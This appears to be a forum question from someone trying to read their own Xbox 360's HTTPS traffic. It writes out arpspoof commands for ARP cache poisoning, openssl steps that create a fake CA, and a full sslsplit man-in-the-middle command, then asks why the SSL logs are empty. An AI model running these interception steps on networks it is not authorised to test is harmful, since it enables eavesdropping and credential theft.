I'm attempting to sniff my Xbox 360's traffic and see the cleartext data sent over HTTPS+SSL.
My Xbox 360's local IP address is: 192.168.0.22.
My attacker Arch Linux box's address is: 192.168.0.18.
I have installed dsniff and SSLsplit on the attacker box and am performing an ARP cache poisoning attack using the following commands simultaneously in two terminal windows:
arpspoof -i enp0s25 -t 192.168.0.1 192.168.0.22
arpspoof -i enp0s25 -t 192.168.0.22 192.168.0.1
I created a fake certificate using the following commands:
openssl genrsa -out ca.key 4096
openssl req -new -x509 -days 1826 -key ca.key -out ca.crt
I am running sslsplit like this:
sslsplit -D -l connections.log -j /var/log/sslsplit/ -S logdir/ -k ca.key -c ca.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080
When I log in to XBL on the 360, I see non-SSL traffic over port 80 in the logs, but the SSL traffic over port 443 has log files with nothing in them (size=0KB).
My guess is there is a problem with my certificate: it's not able to verify that it has been signed by a Root CA. Do you know of a way to fix this issue?
If that's not the issue, what is and how can I fix it?
Thanks for your help.